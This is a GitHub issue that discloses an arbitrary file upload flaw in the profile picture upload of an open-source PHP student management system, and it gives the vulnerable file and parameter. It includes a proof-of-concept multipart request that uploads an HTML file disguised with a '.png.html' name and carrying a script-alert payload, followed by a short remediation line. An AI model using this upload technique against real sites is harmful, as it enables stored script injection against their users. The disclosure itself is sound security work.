Security Vulnerability: Arbitrary file Upload and Execution

amirhamza05 / Student-Management-System

This is a simple web-based student management software written in PHP and Javascript. This was specifically written for school or educational organization.

http://ems.tserm.com/

245 stars 151 forks source link

Security Vulnerability: Arbitrary file Upload and Execution #37

Open wr3nch0x1 opened 3 years ago

wr3nch0x1 commented 3 years ago

It is possible to upload malicious file to run from profile picture upload using http://ems.tserm.com/user_action.php

Vulnerable parameter: "filename" Vulnerable file: /user_action.php

------WebKitFormBoundarycC5ce2YBWSdAerAB
Content-Disposition: form-data; name="file"; filename="**Untitled.png.html**"
Content-Type: image/png

**<script>alert(1)</script>**
------WebKitFormBoundarycC5ce2YBWSdAerAB--

Remediation: Do not allow user to upload files other than images.